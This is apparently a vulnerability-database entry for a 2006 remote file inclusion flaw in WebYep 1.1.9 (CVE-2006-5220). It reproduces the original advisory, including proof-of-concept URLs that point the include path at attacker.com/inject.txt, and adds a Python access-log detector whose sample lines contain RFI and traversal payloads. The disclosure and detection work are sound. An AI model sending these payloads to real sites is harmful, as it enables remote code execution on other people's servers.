WebYep multiple PHP remote file inclusion vulnerabilities

Vulnerability ID: 1111221    Type: code injection
Published: 2006-10-09    Updated: 2007-09-26
CVE: CVE-2006-5220    CNNVD ID: CNNVD-200610-105
Platform: PHP    CVSS score: 5.1
|Sources
https://www.exploit-db.com/exploits/2496
https://www.securityfocus.com/bid/20406
https://cxsecurity.com/issue/WLB-2006100067
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-105
|Details
Multiple PHP remote file inclusion vulnerabilities in WebYep 1.1.9, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via the webyep_sIncludePath parameter in (1) files in the programm/lib/ directory, including (a) WYApplication.php, (b) WYDocument.php, (c) WYEditor.php, (d) WYElement.php, (e) WYFile.php, (f) WYHTMLTag.php, (g) WYImage.php, (h) WYLanguage.php, (i) WYLink.php, (j) WYPath.php, (k) WYPopupWindowLink.php, (l) WYSelectMenu.php and (m) WYTextArea.php; (2) files in the programm/elements/ directory, including (n) WYGalleryElement.php, (o) WYGuestbookElement.php, (p) WYImageElement.php, (q) WYLogonButtonElement.php, (r) WYLongTextElement.php, (s) WYLoopElement.php, (t) WYMenuElement.php and (u) WYShortTextElement.php; and (3) programm/webyep.php.
|Exploit
ECHO_ADV_48$2006

-----------------------------------------------------------------------------------------------
[ECHO_ADV_48$2006] WebYep <= 1.1.9 (webyep_sIncludePath) Multiple Remote File Inclusion Vulnerability
-----------------------------------------------------------------------------------------------

Author          : Dedi Dwianto a.k.a the_day
Date Found      : October, 05th 2006
Location        : Indonesia, Jakarta
web             : http://advisories.echo.or.id/adv/adv48-theday-2006.txt
Critical Lvl    : Highly critical
Impact          : System access
Where           : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application     : WebYep
version         : <=1.1.9
URL             : http://www.obdev.at

WebYep is a compact Web Content Management System for extremely simple creation of editable
web pages. It is a low priced alternative for small to medium web sites
---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~

In the folder webyep-system/programm/lib, the script WYApplication.php was found to be vulnerable:
---------------------------WYApplication.php---------------------------------------
....
<?

 // $webyep_sIncludePath is used as the include prefix without any validation;
 // with register_globals on, a request parameter of the same name sets it.
 include_once("$webyep_sIncludePath/lib/WYApplication.php");
 include_once("$webyep_sIncludePath/lib/WYHTMLTag.php");

...
----------------------------------------------------------

Input passed to the "$webyep_sIncludePath" parameter in WYApplication.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources.

Other affected files:

webyep-system/programm/lib/WYApplication.php
webyep-system/programm/lib/WYDocument.php
webyep-system/programm/lib/WYEditor.php
webyep-system/programm/lib/WYElement.php
webyep-system/programm/lib/WYFile.php
webyep-system/programm/lib/WYHTMLTag.php
webyep-system/programm/lib/WYImage.php
webyep-system/programm/lib/WYLanguage.php
webyep-system/programm/lib/WYLink.php
webyep-system/programm/lib/WYPath.php
webyep-system/programm/lib/WYPopupWindowLink.php
webyep-system/programm/lib/WYSelectMenu.php
webyep-system/programm/lib/WYTextArea.php
webyep-system/programm/elements/WYGalleryElement.php
webyep-system/programm/elements/WYGuestbookElement.php
webyep-system/programm/elements/WYImageElement.php
webyep-system/programm/elements/WYLogonButtonElement.php
webyep-system/programm/elements/WYLongTextElement.php
webyep-system/programm/elements/WYLoopElement.php
webyep-system/programm/elements/WYMenuElement.php
webyep-system/programm/elements/WYShortTextElement.php
webyep-system/programm/webyep.php

Proof Of Concept:
~~~~~~~~~~~~~~

http://target.com/[webYep_path]/webyep-system/programm/lib/WYApplication.php?webyep_sIncludePath=http://attacker.com/inject.txt?
http://target.com/[webYep_path]/webyep-system/programm/lib/WYDocument.php?webyep_sIncludePath=http://attacker.com/inject.txt?
http://target.com/[webYep_path]/webyep-system/programm/webyep.php?webyep_sIncludePath=http://attacker.com/inject.txt?
http://target.com/[webYep_path]/webyep-system/programm/elements/WYGalleryElement.php?webyep_sIncludePath=http://attacker.com/inject.txt?

Solution:
~~~~~~
- Sanitize variable $webyep_sIncludePath on affected files.
- Turn off register_globals

Timeline:
~~~~~~
05 - 10 - 2006 Bugs Found
05 - 10 - 2006 Vendor Contact
09 - 10 - Public Disclosure

---------------------------------------------------------------------------

Shoutz:
~~
~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous
~ Jessy My Brain
~ az001,boom_3x,mathdule,angelia
~ newbie_hacker@yahoogroups.com
~ #aikmel - #e-c-h-o @irc.dal.net
------------------------------------------------------------------------
---
Contact:
~~~
    EcHo Research & Development Center
    the_day[at]echo[dot]or[dot]id

# milw0rm.com [2006-10-09]
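Detection logic for the request pattern the advisory above describes, added here as an example; it is not part of the original advisory or of WebYep. It flags access-log requests to the listed WebYep scripts whose webyep_sIncludePath value is a URL, a stream scheme, a traversal sequence or a NUL byte; the log lines, addresses and hostnames are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Scripts listed in the advisory as including files via $webyep_sIncludePath.
AFFECTED = re.compile(
    r"/webyep-system/programm/(?:lib/WY\w+\.php|elements/WY\w+Element\.php|webyep\.php)$"
)
# A legitimate include path is a local directory; a URL or stream scheme, a
# protocol-relative URL, directory traversal or a NUL byte is the RFI/LFI shape.
SUSPECT = re.compile(r"^(?:[a-z][a-z0-9+.\-]*:|//)|\.\./|%00|\x00", re.IGNORECASE)
# Apache/nginx combined log format (constructed sample lines below).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def classify_request(target):
    """Return the suspicious webyep_sIncludePath value, or None if the request looks benign."""
    parts = urlsplit(target)
    if not AFFECTED.search(parts.path):
        return None
    # parse_qs percent-decodes once; decoding again catches double-encoded values.
    for value in parse_qs(parts.query, keep_blank_values=True).get("webyep_sIncludePath", []):
        value = unquote(value)
        if SUSPECT.search(value):
            return value
    return None

def scan_log(lines):
    """Return (client_ip, script_path, include_value) for each log line that matches."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        value = classify_request(m.group("target"))
        if value is not None:
            hits.append((m.group("ip"), urlsplit(m.group("target")).path, value))
    return hits

# Constructed sample traffic: two ordinary page hits, then two attempts of the
# kind the advisory describes (addresses and hostnames are placeholders).
SAMPLE_LOG = [
    '203.0.113.5 - - [09/Oct/2006:14:03:11 +0000] "GET /site/webyep-system/programm/webyep.php HTTP/1.0" 200 4120 "-" "Mozilla/4.0"',
    '203.0.113.5 - - [09/Oct/2006:14:03:12 +0000] "GET /site/index.php?page=home HTTP/1.0" 200 2210 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [09/Oct/2006:14:05:40 +0000] "GET /site/webyep-system/programm/lib/WYApplication.php?webyep_sIncludePath=http://example.net/inject.txt? HTTP/1.0" 200 88 "-" "-"',
    '198.51.100.7 - - [09/Oct/2006:14:05:41 +0000] "GET /site/webyep-system/programm/elements/WYGalleryElement.php?webyep_sIncludePath=..%2F..%2Ftmp%2Fx.txt%00 HTTP/1.0" 200 88 "-" "-"',
]

if __name__ == "__main__":
    for ip, script, value in scan_log(SAMPLE_LOG):
        print(f"{ip} -> {script} webyep_sIncludePath={value!r}")
```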
|Affected products
Objective Development WebYep 1.1.9
|References

XF webyep-webyep-file-include (29397): http://xforce.iss.net/xforce/xfdb/29397
BID 20406: http://www.securityfocus.com/bid/20406
BUGTRAQ 20061009 [ECHO_ADV_48$2006] WebYep <= 1.1.9 (webyep_sIncludePath) Multiple Remote File Inclusion Vulnerability: http://www.securityfocus.com/archive/1/archive/1/448009/100/0/threaded
OSVDB 29663: http://www.osvdb.org/29663
OSVDB 29662: http://www.osvdb.org/29662
OSVDB 29661: http://www.osvdb.org/29661
OSVDB 29660: http://www.osvdb.org/29660
OSVDB 29659: http://www.osvdb.org/29659
OSVDB 29658: http://www.osvdb.org/29658
OSVDB 29657: http://www.osvdb.org/29657
OSVDB 29656: http://www.osvdb.org/29656
OSVDB 29655: http://www.osvdb.org/29655
OSVDB 29654: http://www.osvdb.org/29654
OSVDB 29653: http://www.osvdb.org/29653
OSVDB 29652: http://www.osvdb.org/29652
OSVDB 29651: http://www.osvdb.org/29651
OSVDB 29650: http://www.osvdb.org/